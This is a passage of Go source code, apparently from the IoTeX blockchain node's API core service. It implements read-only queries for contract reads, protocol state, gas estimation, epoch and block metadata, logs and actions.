== 0 || core.cfg.Genesis.BlockGasLimit < gasLimit { gasLimit = core.cfg.Genesis.BlockGasLimit } sc, _ = action.NewExecution( sc.Contract(), state.Nonce+1, sc.Amount(), gasLimit, big.NewInt(0), // ReadContract() is read-only, use 0 to prevent insufficient gas sc.Data(), ) retval, receipt, err := core.sf.SimulateExecution(ctx, callerAddr, sc, core.dao.GetBlockHash) if err != nil { return "", nil, status.Error(codes.Internal, err.Error()) } // ReadContract() is read-only, if no error returned, we consider it a success receipt.Status = uint64(iotextypes.ReceiptStatus_Success) res := iotexapi.ReadContractResponse{ Data: hex.EncodeToString(retval), Receipt: receipt.ConvertToReceiptPb(), } if d, err := proto.Marshal(&res); err == nil { core.readCache.Put(key, d) } return res.Data, res.Receipt, nil } // ReadState reads state on blockchain func (core *coreService) ReadState(protocolID string, height string, methodName []byte, arguments [][]byte) (*iotexapi.ReadStateResponse, error) { p, ok := core.registry.Find(protocolID) if !ok { return nil, status.Errorf(codes.Internal, "protocol %s isn't registered", protocolID) } data, readStateHeight, err := core.readState(context.Background(), p, height, methodName, arguments...) 
if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } blkHash, err := core.dao.GetBlockHash(readStateHeight) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } return &iotexapi.ReadStateResponse{ Data: data, BlockIdentifier: &iotextypes.BlockIdentifier{ Height: readStateHeight, Hash: hex.EncodeToString(blkHash[:]), }, }, nil } // SuggestGasPrice suggests gas price func (core *coreService) SuggestGasPrice() (uint64, error) { return core.gs.SuggestGasPrice() } // EstimateGasForAction estimates gas for action func (core *coreService) EstimateGasForAction(in *iotextypes.Action) (uint64, error) { estimateGas, err := core.gs.EstimateGasForAction(in) if err != nil { return 0, status.Error(codes.Internal, err.Error()) } return estimateGas, nil } // EstimateActionGasConsumption estimate gas consume for action without signature func (core *coreService) EstimateActionGasConsumption(ctx context.Context, in *iotexapi.EstimateActionGasConsumptionRequest) (uint64, error) { var ret uint64 // TODO: refactor gas estimation code out of core service switch { case in.GetExecution() != nil: request := in.GetExecution() return core.estimateActionGasConsumptionForExecution(ctx, request, in.GetCallerAddress()) case in.GetTransfer() != nil: ret = uint64(len(in.GetTransfer().Payload))*action.TransferPayloadGas + action.TransferBaseIntrinsicGas case in.GetStakeCreate() != nil: ret = uint64(len(in.GetStakeCreate().Payload))*action.CreateStakePayloadGas + action.CreateStakeBaseIntrinsicGas case in.GetStakeUnstake() != nil: ret = uint64(len(in.GetStakeUnstake().Payload))*action.ReclaimStakePayloadGas + action.ReclaimStakeBaseIntrinsicGas case in.GetStakeWithdraw() != nil: ret = uint64(len(in.GetStakeWithdraw().Payload))*action.ReclaimStakePayloadGas + action.ReclaimStakeBaseIntrinsicGas case in.GetStakeAddDeposit() != nil: ret = uint64(len(in.GetStakeAddDeposit().Payload))*action.DepositToStakePayloadGas + action.DepositToStakeBaseIntrinsicGas case in.GetStakeRestake() != nil: ret = uint64(len(in.GetStakeRestake().Payload))*action.RestakePayloadGas + action.RestakeBaseIntrinsicGas case in.GetStakeChangeCandidate() != nil: ret = uint64(len(in.GetStakeChangeCandidate().Payload))*action.MoveStakePayloadGas + action.MoveStakeBaseIntrinsicGas case in.GetStakeTransferOwnership() != nil: ret = uint64(len(in.GetStakeTransferOwnership().Payload))*action.MoveStakePayloadGas + action.MoveStakeBaseIntrinsicGas case in.GetCandidateRegister() != nil: ret = uint64(len(in.GetCandidateRegister().Payload))*action.CandidateRegisterPayloadGas + action.CandidateRegisterBaseIntrinsicGas case in.GetCandidateUpdate() != nil: ret = action.CandidateUpdateBaseIntrinsicGas default: return 0, status.Error(codes.InvalidArgument, "invalid argument") } return ret, nil } // EpochMeta gets epoch metadata func (core *coreService) EpochMeta(epochNum uint64) (*iotextypes.EpochData, uint64, []*iotexapi.BlockProducerInfo, error) { rp := rolldpos.FindProtocol(core.registry) if rp == nil { return nil, 0, nil, nil } if epochNum < 1 { return nil, 0, nil, status.Error(codes.InvalidArgument, "epoch number cannot be less than one") } epochHeight := rp.GetEpochHeight(epochNum) gravityChainStartHeight, err := core.getGravityChainStartHeight(epochHeight) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } epochData := &iotextypes.EpochData{ Num: epochNum, Height: epochHeight, GravityChainStartHeight: 
gravityChainStartHeight, } pp := poll.FindProtocol(core.registry) if pp == nil { return nil, 0, nil, status.Error(codes.Internal, "poll protocol is not registered") } methodName := []byte("ActiveBlockProducersByEpoch") arguments := [][]byte{[]byte(strconv.FormatUint(epochNum, 10))} height := strconv.FormatUint(epochHeight, 10) data, _, err := core.readState(context.Background(), pp, height, methodName, arguments...) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } var activeConsensusBlockProducers state.CandidateList if err := activeConsensusBlockProducers.Deserialize(data); err != nil { return nil, 0, nil, status.Error(codes.Internal, err.Error()) } numBlks, produce, err := core.getProductivityByEpoch(rp, epochNum, core.bc.TipHeight(), activeConsensusBlockProducers) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } methodName = []byte("BlockProducersByEpoch") data, _, err = core.readState(context.Background(), pp, height, methodName, arguments...) if err != nil { return nil, 0, nil, status.Error(codes.NotFound, err.Error()) } var BlockProducers state.CandidateList if err := BlockProducers.Deserialize(data); err != nil { return nil, 0, nil, status.Error(codes.Internal, err.Error()) } var blockProducersInfo []*iotexapi.BlockProducerInfo for _, bp := range BlockProducers { var active bool var blockProduction uint64 if production, ok := produce[bp.Address]; ok { active = true blockProduction = production } blockProducersInfo = append(blockProducersInfo, &iotexapi.BlockProducerInfo{ Address: bp.Address, Votes: bp.Votes.String(), Active: active, Production: blockProduction, }) } return epochData, numBlks, blockProducersInfo, nil } // RawBlocks gets raw block data func (core *coreService) RawBlocks(startHeight uint64, count uint64, withReceipts bool, withTransactionLogs bool) ([]*iotexapi.BlockInfo, error) { if count == 0 || count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } tipHeight := core.bc.TipHeight() if startHeight > tipHeight { return nil, status.Error(codes.InvalidArgument, "start height should not exceed tip height") } endHeight := startHeight + count - 1 if endHeight > tipHeight { endHeight = tipHeight } var res []*iotexapi.BlockInfo for height := startHeight; height <= endHeight; height++ { blk, err := core.dao.GetBlockByHeight(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } var receiptsPb []*iotextypes.Receipt if withReceipts && height > 0 { receipts, err := core.dao.GetReceipts(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } for _, receipt := range receipts { receiptsPb = append(receiptsPb, receipt.ConvertToReceiptPb()) } } var transactionLogs *iotextypes.TransactionLogs if withTransactionLogs { if transactionLogs, err = core.dao.TransactionLogs(height); err != nil { return nil, status.Error(codes.NotFound, err.Error()) } } res = append(res, &iotexapi.BlockInfo{ Block: blk.ConvertToBlockPb(), Receipts: receiptsPb, TransactionLogs: transactionLogs, }) } return res, nil } // Logs get logs filtered by contract address and topics func (core *coreService) Logs(in *iotexapi.GetLogsRequest) ([]*iotextypes.Log, error) { if in.GetFilter() == nil { return nil, status.Error(codes.InvalidArgument, "empty filter") } var ( logs []*iotextypes.Log err error ) switch { case in.GetByBlock() != nil: req := in.GetByBlock() startBlock, err := core.dao.GetBlockHeight(hash.BytesToHash256(req.BlockHash)) if err != nil 
{ return nil, status.Error(codes.InvalidArgument, "invalid block hash") } logs, err = core.getLogsInBlock(logfilter.NewLogFilter(in.GetFilter(), nil, nil), startBlock) if err != nil { return nil, err } case in.GetByRange() != nil: req := in.GetByRange() startBlock := req.GetFromBlock() if startBlock > core.bc.TipHeight() { return nil, status.Error(codes.InvalidArgument, "start block > tip height") } endBlock := req.GetToBlock() if endBlock > core.bc.TipHeight() || endBlock == 0 { endBlock = core.bc.TipHeight() } paginationSize := req.GetPaginationSize() if paginationSize == 0 { paginationSize = 1000 } if paginationSize > 5000 { paginationSize = 5000 } logs, err = core.getLogsInRange(logfilter.NewLogFilter(in.GetFilter(), nil, nil), startBlock, endBlock, paginationSize) default: return nil, status.Error(codes.InvalidArgument, "invalid GetLogsRequest type") } return logs, err } // StreamBlocks streams blocks func (core *coreService) StreamBlocks(stream iotexapi.APIService_StreamBlocksServer) error { errChan := make(chan error) if err := core.chainListener.AddResponder(NewBlockListener(stream, errChan)); err != nil { return status.Error(codes.Internal, err.Error()) } for { select { case err := <-errChan: if err != nil { err = status.Error(codes.Aborted, err.Error()) } return err } } } // StreamLogs streams logs that match the filter condition func (core *coreService) StreamLogs(in *iotexapi.LogsFilter, stream iotexapi.APIService_StreamLogsServer) error { if in == nil { return status.Error(codes.InvalidArgument, "empty filter") } errChan := make(chan error) // register the log filter so it will match logs in new blocks if err := core.chainListener.AddResponder(logfilter.NewLogFilter(in, stream, errChan)); err != nil { return status.Error(codes.Internal, err.Error()) } for { select { case err := <-errChan: if err != nil { err = status.Error(codes.Aborted, err.Error()) } return err } } } // ElectionBuckets returns the native election buckets. 
func (core *coreService) ElectionBuckets(epochNum uint64) ([]*iotextypes.ElectionBucket, error) { if core.electionCommittee == nil { return nil, status.Error(codes.Unavailable, "Native election no supported") } buckets, err := core.electionCommittee.NativeBucketsByEpoch(epochNum) if err != nil { return nil, status.Error(codes.Internal, err.Error()) } re := make([]*iotextypes.ElectionBucket, len(buckets)) for i, b := range buckets { startTime, err := ptypes.TimestampProto(b.StartTime()) if err != nil { return nil, status.Error(codes.Internal, err.Error()) } re[i] = &iotextypes.ElectionBucket{ Voter: b.Voter(), Candidate: b.Candidate(), Amount: b.Amount().Bytes(), StartTime: startTime, Duration: ptypes.DurationProto(b.Duration()), Decay: b.Decay(), } } return re, nil } // ReceiptByActionHash returns receipt by action hash func (core *coreService) ReceiptByActionHash(h hash.Hash256) (*action.Receipt, error) { if !core.hasActionIndex || core.indexer == nil { return nil, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) } actIndex, err := core.indexer.GetActionIndex(h[:]) if err != nil { return nil, err } return core.dao.GetReceiptByActionHash(h, actIndex.BlockHeight()) } // TransactionLogByActionHash returns transaction log by action hash func (core *coreService) TransactionLogByActionHash(actHash string) (*iotextypes.TransactionLog, error) { if !core.hasActionIndex || core.indexer == nil { return nil, status.Error(codes.Unimplemented, blockindex.ErrActionIndexNA.Error()) } if !core.dao.ContainsTransactionLog() { return nil, status.Error(codes.Unimplemented, filedao.ErrNotSupported.Error()) } h, err := hex.DecodeString(actHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } actIndex, err := core.indexer.GetActionIndex(h) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } sysLog, err := core.dao.TransactionLogs(actIndex.BlockHeight()) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } for _, log := range sysLog.Logs { if bytes.Equal(h, log.ActionHash) { return log, nil } } return nil, status.Errorf(codes.NotFound, "transaction log not found for action %s", actHash) } // TransactionLogByBlockHeight returns transaction log by block height func (core *coreService) TransactionLogByBlockHeight(blockHeight uint64) (*iotextypes.BlockIdentifier, *iotextypes.TransactionLogs, error) { if !core.dao.ContainsTransactionLog() { return nil, nil, status.Error(codes.Unimplemented, filedao.ErrNotSupported.Error()) } tip, err := core.dao.Height() if err != nil { return nil, nil, status.Error(codes.Internal, err.Error()) } if blockHeight < 1 || blockHeight > tip { return nil, nil, status.Errorf(codes.InvalidArgument, "invalid block height = %d", blockHeight) } h, err := core.dao.GetBlockHash(blockHeight) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, nil, status.Error(codes.NotFound, err.Error()) } return nil, nil, status.Error(codes.Internal, err.Error()) } blockIdentifier := &iotextypes.BlockIdentifier{ Hash: hex.EncodeToString(h[:]), Height: blockHeight, } sysLog, err := core.dao.TransactionLogs(blockHeight) if err != nil { if errors.Cause(err) == db.ErrNotExist { // should return empty, no transaction happened in block return blockIdentifier, nil, nil } return nil, nil, status.Error(codes.Internal, 
err.Error()) } return blockIdentifier, sysLog, nil } // Start starts the API server func (core *coreService) Start() error { if err := core.bc.AddSubscriber(core.readCache); err != nil { return errors.Wrap(err, "failed to add readCache") } if err := core.bc.AddSubscriber(core.chainListener); err != nil { return errors.Wrap(err, "failed to add chainListener") } if err := core.chainListener.Start(); err != nil { return errors.Wrap(err, "failed to start blockchain listener") } return nil } // Stop stops the API server func (core *coreService) Stop() error { return core.chainListener.Stop() } func (core *coreService) readState(ctx context.Context, p protocol.Protocol, height string, methodName []byte, arguments ...[]byte) ([]byte, uint64, error) { key := ReadKey{ Name: p.Name(), Height: height, Method: methodName, Args: arguments, } if d, ok := core.readCache.Get(key.Hash()); ok { var h uint64 if height != "" { h, _ = strconv.ParseUint(height, 0, 64) } return d, h, nil } // TODO: need to complete the context tipHeight := core.bc.TipHeight() ctx = protocol.WithBlockCtx(ctx, protocol.BlockCtx{ BlockHeight: tipHeight, }) ctx = genesis.WithGenesisContext( protocol.WithRegistry(ctx, core.registry), core.cfg.Genesis, ) ctx = protocol.WithFeatureCtx(protocol.WithFeatureWithHeightCtx(ctx)) rp := rolldpos.FindProtocol(core.registry) if rp == nil { return nil, uint64(0), errors.New("rolldpos is not registered") } tipEpochNum := rp.GetEpochNum(tipHeight) if height != "" { inputHeight, err := strconv.ParseUint(height, 0, 64) if err != nil { return nil, uint64(0), err } inputEpochNum := rp.GetEpochNum(inputHeight) if inputEpochNum < tipEpochNum { // old data, wrap to history state reader d, h, err := p.ReadState(ctx, factory.NewHistoryStateReader(core.sf, rp.GetEpochHeight(inputEpochNum)), methodName, arguments...) if err == nil { core.readCache.Put(key.Hash(), d) } return d, h, err } } // TODO: need to distinguish user error and system error d, h, err := p.ReadState(ctx, core.sf, methodName, arguments...) 
if err == nil { core.readCache.Put(key.Hash(), d) } return d, h, err } func (core *coreService) getActionsFromIndex(totalActions, start, count uint64) ([]*iotexapi.ActionInfo, error) { hashes, err := core.indexer.GetActionHashFromIndex(start, count) if err != nil { return nil, status.Error(codes.Unavailable, err.Error()) } var actionInfo []*iotexapi.ActionInfo for i := range hashes { act, err := core.getAction(hash.BytesToHash256(hashes[i]), false) if err != nil { return nil, status.Error(codes.Unavailable, err.Error()) } actionInfo = append(actionInfo, act) } return actionInfo, nil } // Actions returns actions within the range func (core *coreService) Actions(start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } totalActions, err := core.indexer.GetTotalActions() if err != nil { return nil, status.Error(codes.Internal, err.Error()) } if start >= totalActions { return nil, status.Error(codes.InvalidArgument, "start exceeds the total actions in the block") } if totalActions == uint64(0) || count == 0 { return []*iotexapi.ActionInfo{}, nil } if start+count > totalActions { count = totalActions - start } if core.hasActionIndex { return core.getActionsFromIndex(totalActions, start, count) } // Finding actions in reverse order saves time for querying most recent actions reverseStart := totalActions - (start + count) if totalActions < start+count { reverseStart = uint64(0) count = totalActions - start } var res []*iotexapi.ActionInfo var hit bool for height := core.bc.TipHeight(); height >= 1 && count > 0; height-- { blk, err := core.dao.GetBlockByHeight(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } if !hit && reverseStart >= uint64(len(blk.Actions)) { reverseStart -= uint64(len(blk.Actions)) continue } // now reverseStart < len(blk.Actions), we are going to fetch actions from this block hit = true act := core.reverseActionsInBlock(blk, reverseStart, count) res = append(act, res...) 
count -= uint64(len(act)) reverseStart = 0 } return res, nil } // Action returns action by action hash func (core *coreService) Action(actionHash string, checkPending bool) (*iotexapi.ActionInfo, error) { actHash, err := hash.HexStringToHash256(actionHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } act, err := core.getAction(actHash, checkPending) if err != nil { return nil, status.Error(codes.Unavailable, err.Error()) } return act, nil } // ActionsByAddress returns all actions associated with an address func (core *coreService) ActionsByAddress(addr address.Address, start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } actions, err := core.indexer.GetActionsByAddress(hash.BytesToHash160(addr.Bytes()), start, count) if err != nil { if errors.Cause(err) == db.ErrBucketNotExist || errors.Cause(err) == db.ErrNotExist { // no actions associated with address, return nil return nil, nil } return nil, status.Error(codes.NotFound, err.Error()) } var res []*iotexapi.ActionInfo for i := range actions { act, err := core.getAction(hash.BytesToHash256(actions[i]), false) if err != nil { continue } res = append(res, act) } return res, nil } // getBlockHashByActionHash returns block hash by action hash func (core *coreService) getBlockHashByActionHash(h hash.Hash256) (hash.Hash256, error) { actIndex, err := core.indexer.GetActionIndex(h[:]) if err != nil { return hash.ZeroHash256, err } return core.dao.GetBlockHash(actIndex.BlockHeight()) } // getActionByActionHash returns action by action hash func (core *coreService) getActionByActionHash(h hash.Hash256) (action.SealedEnvelope, hash.Hash256, uint64, uint32, error) { actIndex, err := core.indexer.GetActionIndex(h[:]) if err != nil { return action.SealedEnvelope{}, hash.ZeroHash256, 0, 0, err } blk, err := core.dao.GetBlockByHeight(actIndex.BlockHeight()) if err != nil { return action.SealedEnvelope{}, hash.ZeroHash256, 0, 0, err } selp, index, err := core.dao.GetActionByActionHash(h, actIndex.BlockHeight()) return selp, blk.HashBlock(), actIndex.BlockHeight(), index, err } // UnconfirmedActionsByAddress returns all unconfirmed actions in actpool associated with an address func (core *coreService) UnconfirmedActionsByAddress(address string, start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } selps := core.ap.GetUnconfirmedActs(address) if len(selps) == 0 { return []*iotexapi.ActionInfo{}, nil } if start >= uint64(len(selps)) { return nil, status.Error(codes.InvalidArgument, "start exceeds the limit") } var res []*iotexapi.ActionInfo for i := start; i < uint64(len(selps)) && i < start+count; i++ { if act, err := core.pendingAction(selps[i]); err == nil { res = append(res, act) } } return res, nil } // ActionsByBlock returns all actions in a block func (core *coreService) ActionsByBlock(blkHash string, start uint64, count uint64) ([]*iotexapi.ActionInfo, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit && count != math.MaxUint64 { return nil, 
status.Error(codes.InvalidArgument, "range exceeds the limit") } hash, err := hash.HexStringToHash256(blkHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } blk, err := core.dao.GetBlock(hash) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } if start >= uint64(len(blk.Actions)) { return nil, status.Error(codes.InvalidArgument, "start exceeds the limit") } return core.actionsInBlock(blk, start, count), nil } // BlockMetas returns blockmetas response within the height range func (core *coreService) BlockMetas(start uint64, count uint64) ([]*iotextypes.BlockMeta, error) { if count == 0 { return nil, status.Error(codes.InvalidArgument, "count must be greater than zero") } if count > core.cfg.API.RangeQueryLimit { return nil, status.Error(codes.InvalidArgument, "range exceeds the limit") } var ( tipHeight = core.bc.TipHeight() res = make([]*iotextypes.BlockMeta, 0) ) if start > tipHeight { return nil, status.Error(codes.InvalidArgument, "start height should not exceed tip height") } for height := start; height <= tipHeight && count > 0; height++ { blockMeta, err := core.getBlockMetaByHeight(height) if err != nil { return nil, err } res = append(res, blockMeta) count-- } return res, nil } // BlockMetaByHash returns blockmeta response by block hash func (core *coreService) BlockMetaByHash(blkHash string) (*iotextypes.BlockMeta, error) { hash, err := hash.HexStringToHash256(blkHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } height, err := core.dao.GetBlockHeight(hash) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } return core.getBlockMetaByHeight(height) } // getBlockMetaByHeight gets BlockMeta by height func (core *coreService) getBlockMetaByHeight(height uint64) (*iotextypes.BlockMeta, error) { blk, err := core.dao.GetBlockByHeight(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } // get block's receipt if blk.Height() > 0 { blk.Receipts, err = core.dao.GetReceipts(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } } return generateBlockMeta(blk), nil } // generateBlockMeta generates BlockMeta from block func generateBlockMeta(blk *block.Block) *iotextypes.BlockMeta { header := blk.Header height := header.Height() ts, _ := ptypes.TimestampProto(header.Timestamp()) var ( producerAddress string h hash.Hash256 ) if blk.Height() > 0 { producerAddress = header.ProducerAddress() h = header.HashBlock() } else { h = block.GenesisHash() } txRoot := header.TxRoot() receiptRoot := header.ReceiptRoot() deltaStateDigest := header.DeltaStateDigest() prevHash := header.PrevHash() blockMeta := iotextypes.BlockMeta{ Hash: hex.EncodeToString(h[:]), Height: height, Timestamp: ts, ProducerAddress: producerAddress, TxRoot: hex.EncodeToString(txRoot[:]), ReceiptRoot: hex.EncodeToString(receiptRoot[:]), DeltaStateDigest: hex.EncodeToString(deltaStateDigest[:]), PreviousBlockHash: hex.EncodeToString(prevHash[:]), } if logsBloom := header.LogsBloomfilter(); logsBloom != nil { blockMeta.LogsBloom = hex.EncodeToString(logsBloom.Bytes()) } blockMeta.NumActions = int64(len(blk.Actions)) blockMeta.TransferAmount = blk.CalculateTransferAmount().String() blockMeta.GasLimit, blockMeta.GasUsed = gasLimitAndUsed(blk) return &blockMeta } // GasLimitAndUsed returns the gas limit and used in a block func gasLimitAndUsed(b *block.Block) (uint64, uint64) { var 
gasLimit, gasUsed uint64 for _, tx := range b.Actions { gasLimit += tx.GasLimit() } for _, r := range b.Receipts { gasUsed += r.GasConsumed } return gasLimit, gasUsed } func (core *coreService) getGravityChainStartHeight(epochHeight uint64) (uint64, error) { gravityChainStartHeight := epochHeight if pp := poll.FindProtocol(core.registry); pp != nil { methodName := []byte("GetGravityChainStartHeight") arguments := [][]byte{[]byte(strconv.FormatUint(epochHeight, 10))} data, _, err := core.readState(context.Background(), pp, "", methodName, arguments...) if err != nil { return 0, err } if len(data) == 0 { return 0, nil } if gravityChainStartHeight, err = strconv.ParseUint(string(data), 10, 64); err != nil { return 0, err } } return gravityChainStartHeight, nil } func (core *coreService) committedAction(selp action.SealedEnvelope, blkHash hash.Hash256, blkHeight uint64) (*iotexapi.ActionInfo, error) { actHash, err := selp.Hash() if err != nil { return nil, err } header, err := core.dao.Header(blkHash) if err != nil { return nil, err } sender := selp.SrcPubkey().Address() receipt, err := core.dao.GetReceiptByActionHash(actHash, blkHeight) if err != nil { return nil, err } gas := new(big.Int) gas = gas.Mul(selp.GasPrice(), big.NewInt(int64(receipt.GasConsumed))) return &iotexapi.ActionInfo{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: hex.EncodeToString(blkHash[:]), BlkHeight: header.Height(), Sender: sender.String(), GasFee: gas.String(), Timestamp: header.BlockHeaderCoreProto().Timestamp, }, nil } func (core *coreService) pendingAction(selp action.SealedEnvelope) (*iotexapi.ActionInfo, error) { actHash, err := selp.Hash() if err != nil { return nil, err } sender := selp.SrcPubkey().Address() return &iotexapi.ActionInfo{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: hex.EncodeToString(hash.ZeroHash256[:]), BlkHeight: 0, Sender: sender.String(), Timestamp: nil, Index: 0, }, nil } func (core *coreService) getAction(actHash hash.Hash256, checkPending bool) (*iotexapi.ActionInfo, error) { selp, blkHash, blkHeight, actIndex, err := core.getActionByActionHash(actHash) if err == nil { act, err := core.committedAction(selp, blkHash, blkHeight) if err != nil { return nil, err } act.Index = actIndex return act, nil } // Try to fetch pending action from actpool if checkPending { selp, err = core.ap.GetActionByHash(actHash) } if err != nil { return nil, err } return core.pendingAction(selp) } func (core *coreService) actionsInBlock(blk *block.Block, start, count uint64) []*iotexapi.ActionInfo { var res []*iotexapi.ActionInfo if len(blk.Actions) == 0 || start >= uint64(len(blk.Actions)) { return res } h := blk.HashBlock() blkHash := hex.EncodeToString(h[:]) blkHeight := blk.Height() ts := blk.Header.BlockHeaderCoreProto().Timestamp lastAction := start + count if count == math.MaxUint64 { // count = -1 means to get all actions lastAction = uint64(len(blk.Actions)) } else { if lastAction >= uint64(len(blk.Actions)) { lastAction = uint64(len(blk.Actions)) } } for i := start; i < lastAction; i++ { selp := blk.Actions[i] actHash, err := selp.Hash() if err != nil { log.L().Debug("Skipping action due to hash error", zap.Error(err)) continue } sender := selp.SrcPubkey().Address() res = append(res, &iotexapi.ActionInfo{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: blkHash, Timestamp: ts, BlkHeight: blkHeight, Sender: sender.String(), Index: uint32(i), }) } return res } func (core *coreService) reverseActionsInBlock(blk *block.Block, 
reverseStart, count uint64) []*iotexapi.ActionInfo { h := blk.HashBlock() blkHash := hex.EncodeToString(h[:]) blkHeight := blk.Height() ts := blk.Header.BlockHeaderCoreProto().Timestamp var res []*iotexapi.ActionInfo for i := reverseStart; i < uint64(len(blk.Actions)) && i < reverseStart+count; i++ { ri := uint64(len(blk.Actions)) - 1 - i selp := blk.Actions[ri] actHash, err := selp.Hash() if err != nil { log.L().Debug("Skipping action due to hash error", zap.Error(err)) continue } sender := selp.SrcPubkey().Address() res = append([]*iotexapi.ActionInfo{{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: blkHash, Timestamp: ts, BlkHeight: blkHeight, Sender: sender.String(), Index: uint32(ri), }}, res...) } return res } func (core *coreService) getLogsInBlock(filter *logfilter.LogFilter, blockNumber uint64) ([]*iotextypes.Log, error) { logBloomFilter, err := core.bfIndexer.BlockFilterByHeight(blockNumber) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } if !filter.ExistInBloomFilterv2(logBloomFilter) { return nil, nil } receipts, err := core.dao.GetReceipts(blockNumber) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } h, err := core.dao.GetBlockHash(blockNumber) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } return filter.MatchLogs(receipts, h), nil } // TODO: improve using goroutine func (core *coreService) getLogsInRange(filter *logfilter.LogFilter, start, end, paginationSize uint64) ([]*iotextypes.Log, error) { if start > end { return nil, errors.New("invalid start and end height") } if start == 0 { start = 1 } logs := []*iotextypes.Log{} // getLogs via range Blooom filter [start, end] blockNumbers, err := core.bfIndexer.FilterBlocksInRange(filter, start, end) if err != nil { return nil, err } for _, i := range blockNumbers { logsInBlock, err := core.getLogsInBlock(filter, i) if err != nil { return nil, err } for _, log := range logsInBlock { logs = append(logs, log) if len(logs) >= int(paginationSize) { return logs, nil } } } return logs, nil } func (core *coreService) estimateActionGasConsumptionForExecution(ctx context.Context, exec *iotextypes.Execution, sender string) (uint64, error) { sc := &action.Execution{} if err := sc.LoadProto(exec); err != nil { return 0, status.Error(codes.InvalidArgument, err.Error()) } addr, err := address.FromString(sender) if err != nil { return 0, status.Error(codes.FailedPrecondition, err.Error()) } state, err := accountutil.AccountState(core.sf, addr) if err != nil { return 0, status.Error(codes.InvalidArgument, err.Error()) } nonce := state.Nonce + 1 callerAddr, err := address.FromString(sender) if err != nil { return 0, status.Error(codes.InvalidArgument, err.Error()) } enough, receipt, err := core.isGasLimitEnough(ctx, callerAddr, sc, nonce, core.cfg.Genesis.BlockGasLimit) if err != nil { return 0, status.Error(codes.Internal, err.Error()) } if !enough { if receipt.ExecutionRevertMsg() != "" { return 0, status.Errorf(codes.Internal, fmt.Sprintf("execution simulation is reverted due to the reason: %s", receipt.ExecutionRevertMsg())) } return 0, status.Error(codes.Internal, fmt.Sprintf("execution simulation failed: status = %d", receipt.Status)) } estimatedGas := receipt.GasConsumed enough, _, err = core.isGasLimitEnough(ctx, callerAddr, sc, nonce, estimatedGas) if err != nil && err != action.ErrInsufficientFunds { return 0, status.Error(codes.Internal, err.Error()) } if !enough { low, high := estimatedGas, core.cfg.Genesis.BlockGasLimit 
estimatedGas = high for low <= high { mid := (low + high) / 2 enough, _, err = core.isGasLimitEnough(ctx, callerAddr, sc, nonce, mid) if err != nil && err != action.ErrInsufficientFunds { return 0, status.Error(codes.Internal, err.Error()) } if enough { estimatedGas = mid high = mid - 1 } else { low = mid + 1 } } } return estimatedGas, nil } func (core *coreService) isGasLimitEnough( ctx context.Context, caller address.Address, sc *action.Execution, nonce uint64, gasLimit uint64, ) (bool, *action.Receipt, error) { ctx, span := tracer.NewSpan(ctx, "Server.isGasLimitEnough") defer span.End() sc, _ = action.NewExecution( sc.Contract(), nonce, sc.Amount(), gasLimit, big.NewInt(0), sc.Data(), ) ctx, err := core.bc.Context(ctx) if err != nil { return false, nil, err } _, receipt, err := core.sf.SimulateExecution(ctx, caller, sc, core.dao.GetBlockHash) if err != nil { return false, nil, err } return receipt.Status == uint64(iotextypes.ReceiptStatus_Success), receipt, nil } func (core *coreService) getProductivityByEpoch( rp *rolldpos.Protocol, epochNum uint64, tipHeight uint64, abps state.CandidateList, ) (uint64, map[string]uint64, error) { num, produce, err := rp.ProductivityByEpoch(epochNum, tipHeight, func(start uint64, end uint64) (map[string]uint64, error) { return blockchain.Productivity(core.bc, start, end) }) if err != nil { return 0, nil, status.Error(codes.NotFound, err.Error()) } // check if there is any active block producer who didn't prodcue any block for _, abp := range abps { if _, ok := produce[abp.Address]; !ok { produce[abp.Address] = 0 } } return num, produce, nil } func (core *coreService) getProtocolAccount(ctx context.Context, addr string) 